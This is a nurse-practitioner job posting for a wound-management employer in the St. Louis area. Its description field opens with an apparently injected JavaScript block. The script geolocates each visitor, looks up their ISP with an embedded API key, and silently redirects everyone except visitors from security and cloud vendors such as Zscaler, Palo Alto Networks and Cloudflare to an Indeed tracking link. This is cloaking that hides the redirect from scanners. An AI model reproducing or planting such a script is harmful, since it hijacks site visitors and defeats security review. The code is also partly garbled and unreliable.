Job Description
// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/ed8f8750a3f26504/50acb5d9d8adfd63c5dd50b1cc570e8fa4cac636f60891fd058764c7f129171f/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });Immediate Part-Time openings are available for Adult, Family, and Geriatric Nurse Practitioners in the greater St. Louis and Metro East Illinois areas, specializing in Wound Management.
This opportunity offers flexible schedules to help supplement your income and support your career growth within a caring and supportive environment.
Preferred candidates hold licensure in both Illinois and Missouri.
Our philosophy emphasizes Love, Care, and Understanding, extending to residents, families, and staff. Join our team and grow your career while making a difference.
To apply, contact Rita Kelley via phone, fax, or email with your resume:
- Phone: 636-536-0183
- Fax: 636-536-0526
- Email: rkelley@specializedwound.com
We are an Affirmative Action/Equal Opportunity Employer welcoming females, minorities, disabled individuals, and veterans.